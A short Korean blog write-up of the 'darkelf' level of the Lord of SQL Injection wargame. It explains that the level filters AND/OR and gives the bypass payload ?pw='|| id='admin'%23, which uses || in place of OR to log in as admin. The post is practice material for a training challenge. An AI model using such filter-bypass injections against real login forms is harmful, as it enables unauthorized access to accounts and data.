티스토리 뷰

writeup/LOS

[Lord of SQL injection] darkelf

hoppi 2021. 7. 2. 14:06

마흔네 번째 글.

 

 

1. 코드 분석

이번에는 AND와 OR을 필터링하고 있었고

result의 id가 admin이면 풀리게 된다.

 

 

2. Exploit

AND -> &&, OR -> || 로 우회하면 된다.

 

?pw='|| id='admin'%23

 

 

아직까지는 매우쉽다...

'writeup > LOS' 카테고리의 다른 글

[Lord of SQL injection] vampire  (0) 2021.07.10
[Lord of SQL injection] troll  (0) 2021.07.10
[Lord of SQL injection] wolfman  (0) 2021.07.02
[Lord of SQL injection] orc  (0) 2021.06.28
[Lord of SQL injection] goblin  (0) 2021.06.28